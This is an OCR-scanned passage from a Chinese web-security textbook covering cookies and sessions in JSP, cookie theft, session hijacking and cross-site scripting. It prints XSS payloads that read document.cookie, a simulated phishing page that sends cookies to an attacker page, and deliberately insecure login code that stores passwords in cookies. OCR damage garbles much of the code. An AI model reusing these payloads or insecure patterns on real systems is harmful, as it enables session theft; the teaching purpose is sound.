如 何 解决 以 上 问题 ? 由 于 该 问题 的 出 现 和 8.2 节 中 一 样 ,大 家 可 以 参考 其 中 内 容 ， 
自己 设计 相应 方法 。 


8.3.3 ” Cookie 方法 


在 页 面 之 间 传 递 数据 的 过 程 中 ,Cookie 是 一 种 常见 的 方法 。Cookie 是 一 个 小 的 文 
本 数据 , 由 服务 器 端 生成 , 发送 给 客户 端 浏览 器 ,客户 端 浏 览 器 如 果 设置 为 启用 
Cookie, 则 会 将 这 个 小 文本 数据 保存 到 其 某 个 目录 下 的 文本 文件 内 。 

客户 端 下 次 登录 同一 网 站 ,浏览 器 则 会 自动 将 Cookie 读 入 之 后 , 传 给 服务 器 端 。 ， 
服务 器 端 可 以 对 该 Cookie 进行 读 取 并 验证 (当然 也 可 以 不 读 取 )。 一 般 情 况 下 ,Cookie ， 
中 的 值 是 以 key-value 的 形式 进行 表达 的 。 | 

基于 这 个 原理 ,上 面 的 例子 可 以 用 Cookie 来 进行 。 即 在 第 一 个 页 面 中 ,将 要 共享 
的 变量 值 保存 在 客户 端 Cookie 文件 内 ,在 客户 端 访问 第 二 个 页 面 时 ,由 于 浏览 器 自动 
将 Cookie 读 入 之 后 , 传 给 服务 器 端 , 因 此 只 需要 第 二 个 页 面 中 ,由 服务 器 端 页 面 读 取 这 
个 Cookie 值 即 可 。 

不 同 的 语言 中 对 Cookie 有 不 同 的 操作 方法 ,下 面 以 JSP 为 例 ,来 编写 代码 。 页 面 
1 代码 为 : 


cookieP1. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
< 和 
// 定义 一 个 变量 : 
String str = "12"; 
int number = Integer.parseInt(str); 
第 > 
该 数字 的 平方 为 : <% = number * number %><HR> 
<% 
// 将 str 存 人 Cookie 
Cookie cookie = new Cookie("number", str); 
// 设置 Cookie 的 存活 期 为 600s 
cookie. setMaxAge(600); 
// 将 Cookie 保存 于 客户 端 
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response. addCookie(cookie) ; 
第 > 
<a href = "cookieP2. jsp"> 到 达 cookieP2 </a> 


运行 ,显示 结果 如 图 8-18 所 示 。 
该 数字 的 平方 为 ，144 
到 达 cookiep2 
图 8-18 
页 面 上 有 一 个 链接 到 达 cookieP2. jsp, 其 代码 为 : 


cookieP2. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
< 和 
// 从 Cookie 获得 number 
String str = null; 
Cookie[ ] cookies = request. getCookies(); 
for(int i=0;i<cookies. length;i++ ) 
{ 
if(cookies[i].getName().equals("number")) 
{ 
str = cookies[i].getValue(); 
break; 
} 
} 
int number = Integer.parseInt(str); 
第 > 
该 数字 的 立方 为 : <% = number * number x* number %><HR> 


单 击 cookieP1 中 的 链接 ,到 达 cookieP2 ,效果 如 图 8-19 所 示 ,也 能 够 得 到 结果 。 
i 在 客户 端的 浏览 器 上 ,看 不 到 任何 的 和 传递 的 值 相关 的 信 
”和 息 ,说 明 在 客户 端 浏览 器 中 ,Cookie 中 的 数据 是 安全 的 。 

国光 但 是 就 此 也 不 能 说 Cookie 是 完全 安全 的 。 因 为 Cookie 是 
以 文件 形式 保存 在 客户 端的 ,客户 端 存储 的 Cookie 文件 就 可 能 敌 方 获知 。 在 本 例 中 ， 
内 容 被 保存 在 Cookie 文件 ,如 果 使 用 的 是 Windows XP,C 盘 是 系统 盘 ,该 文件 保存 在 
C:\Documents and Settings\ 当 前 用 户 名 \Cookies 下 。 打 开 该 目录 ,可 以 看 到 里 面 有 一 
个 文件 如 图 8-20 所 示 。 


Bc:\ocments ma Settines ininistrater\Cookies 


小 
和 文才 卖 任务 ¥ Qindex. dt 176 KB DAT 文件 


目 saninistratorBe-3[1]. txt 1 KB 文本 文档 


图 8-20 
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打开 那个 文本 文件 ,内 容 如 图 8-21 所 示 。 


re8-3[1] .txt = 证 地 二 
文件 四 格式 Q) 查看 中 帮助 0D 
numberg120localhost/Prj88/8-3/1924 
347886374430044761017813316400 
300447600 x 


| 加 


图 8-21 


number 的 值 12 可 以 被 很 清楚 地 找到 。 | 

很 明显 ,Cookie 也 不 是 绝对 安全 的 。 如 果 将 用 户 名 、 密 码 等 敏感 信息 保存 在 ， 
Cookie 内 ,在 用 户 离开 客户 机 时 不 注意 清空 ,这 些 信息 容易 泄露 ,因此 Cookie 在 保存 
敏感 信息 方面 具有 潜在 危险 。 

不 过 ,可 以 很 清楚 地 看 到 ,Cookie 的 危险 性 来 源 于 Cookie 的 被 盗 取 。 目 前 盗 取 的 
方法 有 很 多 种 : 

(1) 利用 跨 站 脚本 技术 (有 关 跨 站 脚本 技术 ,后面 将 会 有 介绍 ) ,将 信息 发 给 目标 服 
务 器 ; 为 了 隐藏 跨 站 脚本 的 URL ,其 至 可 以 结合 Ajax( 异 步 JavaScript 和 XML 技术 ) 
在 后 台 窃 取 Cookie; 

(2) 通过 某 些 软件 ,窃取 硬盘 下 的 Cookie。 如 前 所 述 , 当 用 户 访问 完 某 站 点 后 ， 
Cookie 文件 会 存在 机 器 的 某 个 文件 夹 ( 如 C:\Documents and Settings\ 用 户 名 \ 
Cookies) 下 ,因此 可 以 通过 某 些 盗 取 和 分 析 软 件 来 盗 取 Cookie。 具 体 步 又 如 下 : 

@ 利用 盗 取 软件 分 析 系 统 中 的 Cookie, 列 出 用 户 访问 过 的 网 站 ; 

@ 在 这 些 网 站 中 寻找 攻击 者 感 兴趣 的 网 站 ; | 

@ 从 该 网 站 的 Cookie 中 获取 相应 的 信息 。 不 同 的 软件 有 不 同 的 实现 方法 ,有 兴 | 
趣 的 读者 可 以 在 网 上 搜索 相应 的 软件 ; 

(3) 利用 客户 端 脚本 盗 取 Cookie。 在 JavaScript 中 有 很 多 API 可 以 读 取 客 户 端 
Cookie, 可 以 将 这 些 代码 隐藏 在 一 个 程序 (如 画图 片 ) 中 ,很 隐秘 地 得 到 Cookie 的 值 ,不 
过 ,这 也 是 跨 站 脚本 的 一 种 实现 方式 。 

同样 ,以 上 问题 不 代表 Cookie 就 没有 任何 用 处 ,Cookie 在 Web 编程 中 还 是 应 用 很 
广 的 ,主要 来 源 于 以 下 几 个 方面 : | 

。 Cookie 的 值 能 够 持久 化 ,即使 客户 端 机 器 关闭 ,下 次 打开 还 是 可 以 得 到 里 面 的 
值 。 因 此 Cookie 可 以 用 来 减轻 用 户 一 些 验 证 工作 的 输入 负担 ,比如 用 户 名 和 ， 
密码 的 输入 ,就 可 以 在 第 一 次 登录 成 功 之 后 ,将 用 户 名 和 密码 保存 在 客户 端 
Cookie, 下 次 不 用 输入 。 当 然 , 这 不 安全 ,但 是 ,对 于 一 些 安 全 要 求 不 高 的 网 站 ， 
Cookie 还 是 大 有 用 武之 地 。 

Cookie 可 以 帮助 服务 器 端 保存 多 个 状态 信息 ,但 是 不 用 服务 器 端 专门 分 配 存储 
资源 ,减轻 了 服务 器 端的 负担 。 比 如 网 上 商店 中 的 购物 车 ,必须 将 物品 和 具体 ， 
客户 名 称 绑 定 ,但 是 放 在 服务 器 端 又 需要 占据 大 量 资源 的 情况 下 ,可 以 用 ， 
Cookie 来 实现 ,将 每 个 物品 和 客户 的 内 容 作 为 Cookie 来 保存 在 客户 端 。 

Cookie 可 以 持久 保持 一 些 和 客户 相关 的 信息 。 如 很 多 网 站 上 ,客户 可 以 自主 设 
计 自 己 的 个 性 化 主页 ,其 作用 是 避免 用 户 每 次 都 需要 找 自己 喜爱 的 内 容 , 设 计 
好 之 后 .下 次 打开 该 网 址 ,主页 上 显示 的 是 客户 设置 好 的 界面 。 这 些 设置 信息 
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保存 在 服务 器 端的 话 ,消耗 服务 器 端的 资源 ,因此 ,可 以 将 客户 的 个 性 化 设计 保 
存在 Cookie 内 ,每 一 次 访问 该 主页 ,客户 端 将 Cookie 发 送 给 服务 器 端 ,服务 器 
根据 Cookie 的 值 来 决定 显示 给 客户 端 什么 样 的 界面 。 

解决 Cookie 安全 的 方法 有 很 多 ,常见 的 有 以 下 几 种 : 

(1) 替代 Cookie。 将 数据 保存 在 服务 器 端 ,可 选 的 是 session 方案 ; 

(2) 及 时 删除 Cookie。 要 删除 一 个 已 经 存在 的 Cookie, 有 以 下 几 种 方法 : 

。 给 一 个 Cookie 赋 以 空置 ; 

。 设置 Cookie 的 失效 时 间 为 当前 时 间 ,让 该 Cookie 在 当前 页 面 的 浏览 完 之 后 就 
被 删除 了 ; 

。 通过 浏览 器 删除 Cookie。 如 在 正中 ,可 以 选择 “工具 ”一 “Internet 选项 ”一 “ 常 
规 ”, 单 击 “ 删 除 Cookies”, 就 可 以 删除 文件 夹 中 的 Cookie, 如 图 8-22 所 示 。 

yl 


富 规 | 安全 | 隐私 | 内 容 | 连接 | 程序 | 高 级 | 
-站 


可 以 更 改 主 页 。 
地 址 @); 

合用 当前 页 C) | 使 用 默 欠 页 qm) | 使 用 空 和 页 @) | 
Internet 临时 文件 
A 三 定 的 文件 天 中 这样 可 以 
到 辽 Cookies GD | 删除 文 件 中 .| ”设置 避 ..， | 


图 8-22 


(3) 禁用 Cookie。 很 多 浏览 器 中 都 设置 了 禁用 Cookie 的 方法 ,如 IE 中 ,可 以 在 
“工具 ”一 “JInternet 选项 -隐私 ”中 ,将 隐私 级 别 设 置 为 禁用 Cookie, 如 图 8-23 所 示 。 


Internet 选项 Txl 
常规 | 安全 隐私 | 内 容 | 连接 | 程序 | 高 吸 | 
设置 


。 移动 滑 块 采 为 Internet 区 域 选 择 一 个 隐私 设置 。 


阻止 所 有 Ceokie 


| 和 aa 


HE | SAD...| Riv...| WAL 
图 8-23 


| 8.3.4 session 方法 


前 面 几 种 方法 在 传递 数据 时 ,有 一 个 共同 的 问题 是 内 容 都 保存 在 客户 端 , 因 此 具有 
泄露 的 危险 性 。 如 果 在 不 考虑 服务 器 负载 的 情况 下 ,将 数据 保存 在 服务 器 端 ,是 一 个 较 
好 的 方案 ,这 就 是 session 方法 。 
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本 质 上 讲 , 会 话 (session) 的 含义 是 指 某 个 用 户 在 网 站 上 有 始 有 终 的 一 系列 动作 的 
集合 。 例 如 ,用 户 在 访问 网 站 时 ,session 就 是 指 从 用 户 登 录 站 点 到 关闭 浏览 器 所 经 过 
的 这 段 过 程 。session 中 的 数据 可 以 被 同一 个 客户 在 网 站 的 一 次 会 话 过 程 共享 。 但 是 
对 于 不 同 客户 来 说 ,每 个 人 的 session 是 不 同 的 。 服 务 器 上 的 session 分 配 情况 如 


图 8-24 所 示 。 
服务 器 | 
im 7 一 ng 
人 客户 2 访问 多 个 页 面 


CC | 性 


客户 3 访问 多 个 页 面 


图 8-24 


同样 ,不 同 语言 对 于 session 的 控制 不 一 样 ,但 是 原理 类 似 。 以 JSP 为 例 , 本 节 的 例 
子 也 可 以 用 session 方法 来 做 ,首先 是 sessionP1: 


sessionP1. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
<% 
// 定 义 一 个 变量 
String str = "12"; 
int number = Integer.parseInt(str); 
第 > 
该 数字 的 平方 为 : <% = number x number 和 ><HR> 
<% 
// 将 str 存 人 session 
session. setAttribute( "number", str); 
第 > 
<a href = "sessionP2. jsp"> 到 达 sessionP2 </a> 


运行 后 的 效果 如 图 8-25 所 示 。 


该 数字 的 平方 为 ，144 
sessionP2 


图 8-25 
单 击 链接 可 以 到 达 sessionP2,sessionP2 的 源 代码 为 : 


sessionP2. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
<% 

// 从 session 获得 number 

String str = (String)session. getAttribute("number"); 
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int number = Integer.parseInt(str); 
第 > 
该 数字 的 立方 为 : <% = number * number x* number $%><HR> 


单 击 链接 之 后 ,效果 如 图 8-26 所 示 。 


该 数字 的 立方 为 ，1728 可 见 , 也 可 以 实现 页 面 之 间 数 据 的 传递 。session 方法 和 前 
一 一 一 一 一 一 面 儿 个 方法 相 比 ,是 相对 安全 的 。 
国 &26 读者 可 能 想 要 知道 ,同一 个 客户 ,在 访问 多 个 页 面 时 ,多 个 页 


面 用 到 session, 对 他 来 说 是 同一 个 对 象 。 那 么 服务 器 怎么 知道 要 分 配给 它 的 是 同一 个 
session 对 象 呢 ?实际 上 ,在 客户 进行 第 一 次 访问 时 ,服务 器 端 就 给 session 分 配 了 一 个 
sessionId, 并 且 让 客户 端 记 住 了 这 个 sessionId, 客户 端 访问 下 一 个 页 面 时 ,又 将 
sessionId 传送 给 服务 器 端 ,服务 器 端 根 据 这 个 sessionId 来 找到 前 一 个 页 面 用 的 
session, 由 此 保证 为 同一 个 客户 服务 的 session 对 象 是 同一 个 。 

如 下 代码 : 


sessionld]1. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
<% 
String id = session.getId(); 
out. println(" 当 前 sessionId 为 :" + id); 
%> 
<HR> 
<a href = "sessionId2. jsp"> 到 达 下 一 个 页 面 </a> 


sessionJd2. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
<% 

String id = session. getId(); 

out. println(" 当 前 sessionId 为 :" + id); 
%> 


显示 效果 如 图 8-27 所 示 。 
当前 sessionId 为 :323732C05802B36E975417B651BBE97E 
到 达 下 一 个 页 面 


图 8-27 
单 击 链 接 , 下 一 个 页 面 中 显示 如 图 8-28 所 示 。 
当前 sessionId 为 :323732C05802B36E975417B651BBE97E 
图 8-28 
从 这 里 可 以 看 出 ,同一 个 客户 访问 时 ,两 个 Id 相同 。 


提示。 在 用 户 的 机 器 上 ,显示 的 结果 可 能 不 一 样 。 因 为 sessionId 的 分 配 是 随机 
的 ,但 是 ,两 个 页 面 中 显示 的 sessionId 一 定 相 同 。 


本 


综 上 所 述 ,session 分 配 的 具体 过 程 为 : 
。 客户 端 访 问 服务 器 ,服务 器 使 用 session ,首先 检查 这 个 客户 端的 请 求 是 否 已 包 
含 了 sessionId; 
。 如 果 有 ,服务 器 就 在 内 存 中 检索 相应 Id 的 session 来 用 ; 
。 否则 服务 器 为 该 客户 端 创 建 一 个 session 并 且 生 成 一 个 相应 的 sessionId, 并 且 
在 该 次 响应 中 返回 给 客户 端 保存 。 
session 经 常用 于 保存 用 户 登录 状态 。 比 如 用 户 登 录 成 功 之 后 要 访问 好 几 个 页 面 ， 
但 是 每 个 页 面 都 需要 知道 是 哪个 用 户 在 登录 ,此 时 就 可 以 将 用 户 的 用 户 名 保存 在 
session 内 。 


以 下 是 一 个 简单 的 登录 操作 : 


login. jsp 


<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
欢迎 登录 邮箱 
< form action = "login. jsp" method= "post"> 
请 您 输入 账号 : < input name = "account" type = "text"><BR> 
请 您 输入 密码 : < input name = "password" type = "password"><BR> 
< input type = "submit" value = "登录 "> 
</form> 
<% 
// 获 取 账 号 密码 
String account = request.getParameter("account"); 
String password = request.getParameter("password"); 
if(account! = null) 
{ 
// 验 证 账号 密码 ,假如 账号 密码 相同 表示 登录 成 功 
if(account. equals(password)) 


{ 
// 放 入 session, 跳 转 到 下 一 个 页 面 
session. setAttribute("account",account); 
response. sendRedirect("loginResult. jsp"); 
} 
else 
{ 
out.println(" 登 录 不 成 功 "); 
} 


%> 


loginResult. jsp 


<% @ page language = "java" import = "java. util. x* " pageEncoding = "gb2312" %> 
欢迎 <% = session. getAttribute("account") %> 来 到 邮箱 ! 
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输入 正确 的 账号 、 密 码 ( 如 guokehua 和 guokehua), 到 达 第 二 个 页 面 ,显示 如 
图 8-30 所 示 。 


欢迎 谷 录 邮箱 

请 你 输入 账号 厂 一 一 一 一 一 

请 您 输入 密码 ， 欢迎 euokehua 来 到 邮箱 

到 | 请 进行 如 下 操作 ，. 
图 8-29 图 8-30 


说 明 运 行 正 常 。 但 是 该 代码 真 的 正常 吗 ? 不 是 的 ,如 果 用 户 不 经 过 登录 ,直接 访问 
第 二 个 页 面 。 在 此 例子 中 ,重启 服务 器 (主要 是 为 了 将 前 面 测试 的 session 中 的 数据 清 
掉 ) ,在 浏览 器 中 输入 : 


http://localhost:8080/Prj08/8 - 3/loginResult. jsp 


回 车 ,界面 上 显示 如 图 8-31 所 示 。 
欢迎 nul1 来 到 邮箱 ! 显然 ,这 是 不 正常 的 ! 
请 进行 如 下 操作 ， 出 现 该 问题 的 原因 是 session 中 account 没有 赋值 的 情况 
图 8-31 下 就 进行 访问 ,要 解决 该 问题 ,很 简单 ,进行 session 检查 即 可 。 
在 第 二 个 页 面 上 添加 一 段 session 检查 代码 ,如 果 session 中 内 
容 为 null, 则 跳 回 第 一 个 页 面 。 代 码 如 下 : 


loginResult. jsp 


<% @ page language = "java" import = "java.util. * ”pageEncoding = "gb2312" %> 
<% 

if(session. getAttribute("account") == null) 

{ 

response. sendRedirect("login. jsp"); 
} 
第 > 

欢迎 <% = session. getAttribute("account") %> 来 到 邮箱 ! 
<HR> 
请 进行 如 下 操作 : .…… 


浏览 器 中 输入 : 


http://localhost:8080/Prj08/8 - 3/loginResult. jsp 


则 自动 跳 回 登录 页 面 。 

提示。 在 大 项 目 中 ,有 许多 页 面 可 能 都 要 进行 session 检查 ,如 果 将 session 检查 
代码 写 很 多 次 ,势必 出 现 大 量 重复 代码 。 针 对 该 问题 ,可 以 用 两 种 方法 解决 (此 处 只 是 
列举 JSP 系列 中 的 解决 办 法 ): 

(1) 将 session 检查 代码 单独 写 一 个 文件 ,在 每 个 需要 检查 的 网 页 中 包含 它 。 如 
loginResult. jsp 可 以 改 为 : 
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<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
<%@ include file= "session_ include. jsp" %> 

欢迎 <% = session. getAttribute("account") %> 来 到 邮箱 ! 

<HR> 

请 进行 如 下 操作 : .…… 


loginResult. jsp 


session_include. jsp 


< 和 
if(session. getAttribute("account") == null) 
{ 
response. sendRedirect("login. jsp"); 
} 
%> 


运行 ,效果 相同 。 

(2) 利用 过 滤器 。 不 过 ,并 不 是 所 有 的 语言 都 支持 过 滤器 。 关 于 过 滤器 的 知识 , 读 
者 可 以 查阅 相关 文献 。 

以 上 内 容 主要 是 站 在 编程 角度 来 谈论 session 应 该 怎样 使 用 才 最 安全 ; 那么 ,针对 
session 的 攻击 主要 体现 在 哪里 呢 ? 

session 机 制 最 大 的 不 安全 因素 是 sessionId 可 以 被 攻击 者 截获 ,如 果 攻 击 者 通过 
一 些 手段 知道 了 sessionId, 由 于 sessionId 是 客户 端 寻找 服务 器 端 session 对 象 的 唯一 
标识 ,攻击 者 就 有 可 能 根据 sesionId 来 访问 服务 器 端的 session 对 象 ,得 知 session 中 的 
内 容 , 从 而 实施 攻击 。 

在 session 机 制 中 ,很 多 人 认为 : 只 要 浏览 器 关闭 ,会 话 结束 , session 就 消失 了 。 
其 实 不 然 ,浏览 器 关闭 ,会 话 结束 ,对 于 客户 端 来 说 ,已 经 无 法 直接 再 访问 原来 的 那个 
session ,但 并 不 代表 session 在 服务 器 端 会 马上 消失 。 除 非 程 序 通知 服务 器 删除 一 个 
session ,否则 服务 器 会 一 直 保 留 这 个 session 对 象 , 直 到 session 超时 失效 ,被 垃圾 收集 
机 制 收集 掉 。 

但 是 令 人 遗憾 的 是 ,客户 在 关闭 浏览 器 时 ,一 般 不 会 通知 服务 器 。 由 于 关闭 浏览 器 
不 会 导致 session 被 删除 ,因此 ,客户 端 关 闭 之 后 ,session 还 未 失效 的 情况 下 ,就 给 了 攻 
击 者 以 机 会 来 获取 session 中 的 内 容 。 

虽然 sessionId 是 随机 的 长 字符 串 ,通常 比 较 难 被 猜测 到 ,这 在 某 种 程度 上 可 以 加 
强 其 安全 性 ,但 是 一 旦 被 攻击 者 获得 ,就 可 以 进行 一 些 攻 击 活动 ,如 攻击 者 获取 客户 
sessionId, 然 后 攻击 者 自行 伪造 一 个 相同 的 sessionId, 访 问 服务 器 .实际 上 等 价 于 伪装 
成 该 用 户 进行 操作 。 

为 了 防止 以 上 因为 sessionId 泄露 而 造成 的 安全 问题 ,可 以 采用 如 下 方法 : 

。 在 服务 器 端 ,可 以 在 客户 端 登录 系统 时 ,尽量 不 要 使 用 单一 的 sessionId 对 用 户 

登录 进行 验证 。 可 以 通过 一 定 的 手段 .不 时 地 变更 用 户 的 sessionId; 
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。 在 客户 端 ,应 该 在 浏览 器 关闭 时 删除 服务 器 端的 session ,也 就 是 说 在 关闭 时 必 
须 通 知 服务 器 端 。 最 简单 的 方法 ,可 以 用 JavaScript 实现 。 


8.4 ”Web 跨 站 脚本 攻击 


8.4.1 跨 站 脚本 攻击 的 原理 


跨 站 脚本 在 英文 中 称 为 Cross-Site Scripting ,缩写 为 CSS。 但 是 ,由 于 层 释 样 式 表 
(Cascading Style Sheets) 的 缩写 也 为 CSS ,为 不 与 其 混淆 , 特 将 跨 站 脚本 缩写 为 XSS。 

跨 站 脚本 ,顾名思义 ,就 是 恶意 攻击 者 利用 网 站 漏洞 往 Web 页 面 里 插入 恶意 代码 ， 
一 般 需要 以 下 几 个 条 件 : 

。 客户 端 访问 的 网 站 是 一 个 有 漏洞 的 网 站 ,但 是 他 没有 意识 到 ; 

。 在 这 个 网 站 中 通过 一 些 手段 放 和 一段 可 以 执行 的 代码 ,吸引 客户 执行 (通过 鼠 

标点 击 等 ); 

。 客户 点 击 后 ,代码 执行 ,可 以 达到 攻击 目的 。 

XSS 属于 被 动 式 的 攻击 。 为 了 让 读者 了 解 XSS ,首先 举 一 个 简单 的 例子 。 有 一 个 
应 用 ,负责 进行 书本 查询 ,代码 如 下 : 


query. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %$> 
欢迎 查询 书本 
< form action = "queryResult. jsp”method = "post"> 
请 您 输入 书本 的 信息 : <BR> 
< input name = "book" type = "text" size= "50"> 
< input type = "submit" value = "查询 "> 
</form> 


运行 后 的 效果 如 图 8-32 所 示 。 
欢迎 查询 书本 
Ee 


EJ 
图 8-32 


在 文本 框 内 输入 查询 信息 ,提交 ,能 够 到 达 queryResult. jsp 显示 结果 。queryResult. jsp 
代码 如 下 : 


queryResult. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
您 查询 的 关键 字 是 : <% = request. getParameter("book") %> 

<HR> 

查询 结果 为 :.…… 
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运行 query. jsp, 输 入 正常 数据 ,如 Java( 见 图 8-33) 。 
提交 ,显示 的 结果 如 图 8-34 所 示 。 


欢迎 查询 书本 
请 全 输入 书本 的 信息 ， 您 查询 的 关键 字 是 ，Java_ 
El 查询 结果 为 ， 


8-33 图 8-34 


结果 没有 问题 。 但 是 该 程序 有 漏洞 。 比 如 ,客户 输入 "一 I 之 和 FONT SIZE 一 7 二 
Java< /FONT 盖 一 /I”( 见 图 8-35) 。 
查询 显示 的 结果 如 图 8-36 所 示 。 


欢迎 查询 书本 

ni 您 查询 的 关键 字 是 ，。 /a Va 
请 您 输入 书本 的 信息 ， 
FI onT ST1E=7)Javad/ FONT>/I> 查询 查询 结果 为 ，..... . 


图 8-35 图 8-36 


该 问题 是 网 站 对 输入 的 内 容 没 有 进行 任何 标记 检查 造成 的 。 打 开 queryResult. 
jsp 的 客户 端 源 代码 ,显示 如 图 8-37 所 示 。 


区 aqmeryResolt[1] - 记事 本 
文件 EF) 编辑 到 ) 格式 @) 查看 Y) 帮助 和 0) 


查询 的 关键 字 是 ，<1><FONT SIZE=7>Jaua</FONT>《/I> 
<HR> 


图 8-37 
更 有 其 者 ,可 以 输入 某 个 网 站 上 的 一 幅 图 片 地 址 (此 处 引用 Google 首页 上 的 logo 
图 片 )( 见 图 8-38)。 
欢迎 查询 书本 


请 您 输入 书本 的 信息 ， 
img srehttp://ww. go0gle. cr/int1/zh-CNR/inages/108 荐 沿 


图 8-38 
显示 结果 如 图 8-39 所 示 。 


您 查询 的 关键 字 是 ， G 0 ogle 


图 8-39 


很 显然 ,结果 很 不 正常 ! 
以 上 只 是 说 明了 该 表单 提交 没有 对 标记 进行 检查 ,还 没有 起 到 攻击 的 作用 。 为 了 
进行 攻击 ,将 输入 变 成 脚本 ( 见 图 8-40) 。 
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= 


欢迎 查询 书本 


请 您 输入 书本 的 信息 : 
Kscript>alert ("Hello, Java’) </script> 查询 


全 图 8-40 
提交 后 的 结果 如 图 8-41 所 示 。 


图 8-41 


GS esnlt[1] - 记事 本 
文件 @E) | 忽 辑 下 ) 格式 吕 ) 查看 QD) 帮助 00) 


图 8-42 
注意 ,该 程序 可 以 让 攻击 者 利用 脚本 获取 一 些 隐秘 的 信息 了 ! 输入 如 下 查询 关键 
字 ( 见 图 8-43)。 
欢迎 查询 书本 


请 您 输入 书本 的 信息 : 
[Escriptyalert (document. cookie) /script> 查询 


图 8-43 
提交 后 的 结果 如 图 8-44 所 示 。 
您 查询 的 关键 字 是 : 


图 8-44 


消息 框 中 ,将 当前 登录 的 sessionId 显示 出 来 了 。 很 显然 ,该 sessionId 如 果 被 攻击 
者 知道 ,就 可 以 访问 服务 器 端的 该 用 户 session ,获取 一 些 信 息 。 


x 提 示 在 JSP 系列 中 ,sessionId 保存 在 Cookie 中 。 


实际 的 攻击 是 怎样 进行 的 呢 ? 如 前 所 述 ,攻击 者 为 了 得 到 客户 的 隐秘 信息 ,一 般 会 
， 在 网 站 中 通过 一 些 手段 放 和 一段 可 以 执行 的 代码 ,吸引 客户 执行 (通过 鼠标 点 击 等 ); 
， 客户 点 击 后 ,代码 执行 ,可 以 达到 攻击 目的 。 比 如 ,可 以 给 客户 发 送 一 个 邮件 ,吸引 客户 
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点 击 某 个 链接 。 


以 下 模拟 了 一 个 通过 邮件 点 击 链接 的 攻击 过 程 。 攻 击 者 给 客户 发 送 一 个 邮件 ,并 
且 在 电子 邮件 中 ,通过 某 个 利益 的 诱惑 ,鼓动 用 户 尽 快 访问 某 个 网 站 ,并 在 邮件 中 给 一 
个 地 址 链接 ,这 个 链接 的 URL 中 含有 脚本 ,客户 在 点 击 的 过 程 中 ,就 执行 了 这 段 代 码 。 

模拟 一 个 邮箱 系统 ,首先 是 用 户 登录 页 面 , 当 用 户 登 录 成 功 后 ,为 了 以 后 操作 方便 ， 
该 网 站 采用 了 “ 记 住 登录 状态 ”的 功能 ,将 自己 的 用 户 名 和 密码 放 入 Cookie, 并 保存 在 
客户 端 : 


login. jsp 

<% @ page language = "java" import = "java.util. * " pageEncoding = "gb2312" %> 
欢迎 登录 邮箱 
< form action = "login. jsp" method= "post"> 

请 您 输入 账号 : 

< input name = "account" type = "text"> 

<BR> 

请 您 输入 密码 : 

< input name = "password" type= "password"> 

<BR> 

< input type = "submit" value= "登录 "> 
</form> 
<% 

// 获 取 账 号 密码 


String account = request.getParameter("account"); 
String password = request. getParameter("password"); 
if(account! = null) 
{ 
// 验 证 账号 密码 ,假如 账号 密码 相同 表示 登录 成 功 
if(account. equals(password)) 
{ 
// 放 入 session, 跳 转 到 下 一 个 页 面 
session. setAttribute("account",account); 
// 将 自己 的 用 户 名 和 密码 放 人 Cookie 
response. addCookie(new Cookie("account",account)); 
response. addCookie(new Cookie("password", password) ) ; 
response. sendRedirect ("loginResult. jsp"); 


else 
{ 
out. println(" 登 录 不 成 功 "); 
} 
} 
第 > 


运行 ,得 到 界面 如 图 8-45 所 示 。 

输入 正确 的 账号 密码 (如 guokehua、 guokehua), 如 果 登 录 成 功 ,程序 跳 到 
loginResult. jsp ,并 在 页 面 底部 有 一 个 “查看 邮件 ”链接 (当然 ,可 能 还 有 其 他 功能 ,在 此 
省 略 ) 。 代 码 如 下 : 
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欢迎 登录 邮箱 


请 您 输入 账号 , [aaa | 
请 您 输入 密码 : [oeseseee 
盖 | 


图 8-45 


loginResult. jsp 


<% @ page language = "java" import = "java. util. * " pageEncoding = "gb2312" %> 
< 名 //session 检查 
String account = (String)session.getAttribute("account"); 
if(account == null) 
{ 
response. sendRedirect("login. jsp"); 
} 
%> 
欢迎 < 和 % = account %> 来 到 邮箱 ! 
<HR> 
<a href = "mailList. jsp"> 查 看 邮箱 </a> 


运行 效果 如 图 8-46 所 示 。 
欢迎 guokehua 来 到 邮箱 | 
查看 邮箱 
图 8-46 


为 了 模拟 攻击 , 单 击 “ 查 看 邮箱 ”, 在 里 面 放置 一 封 “邮件 ”( 该 邮件 的 内 容 由 攻击 者 


写 ) 。 代 码 如 下 : 


mailList. jsp 


<% @ page language = "java" import = "java. util. * "pageEncoding = "gb2312" %> 
<% 
//session 检查 ,代码 略 
第 > 
<! -- 以 下 是 攻击 者 发 送 的 一 个 邮件 --> 
这 里 有 一 封 新 邮件 ,您 中 奖 了 ,您 有 兴趣 的 话 可 以 点 击 : <BR> 
< script type = "text/javascript"> 
function send() 
{ 
var cookie = document. cookie; 
window. location. href = "http://localhost/attackPage.asp?cookies=" + cookie; 
} 
</script > 
<a onClick = "send()"><u> 领 奖 </u></a> 


效果 如 图 8-47 所 示 。 
注意 ,通过 这 里 的 “ 领 奖 ” 链 路 可 链接 到 另 一 个 网 站 ,该 网 站 一 般 是 攻击 者 自行 建 


立 。 为 了 保证 真实 性 ,在 IS 下 用 ASP 写 了 一 个 网 页 ,因为 攻击 者 页 面 和 被 攻击 者 页 
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人 您 中 奖 了 ， 您 有 兴趣 的 话 可 以 点 击 ， 


图 8-47 


面 一 般 不 是 在 一 个 网 站 内 ,其 URL 为 : 


http://localhost/attackPage. asp 


很 明显 , 如 果 用 户 点 击 链 接 ,脚本 中 的 send 函数 会 将 内 容 发 送 给 http:// 
localhost/attackPage. asp。 假 设 http://localhost/attackPage. asp 的 源 代码 如 下 : 


http://localhost/attackPage. asp 


<% @ Language = "VBScript" %$> 

这 是 模拟 的 攻击 网 站 (IIS)<BR> 

刚才 从 用 户 处 得 到 的 Cookie 值 为 : <BR> 
<% = Request("Cookies") %> 


注意 ,attackPage. asp 要 在 IIS 中 运行 ,和 前 面 的 例子 运行 的 不 是 一 个 服务 器 。 
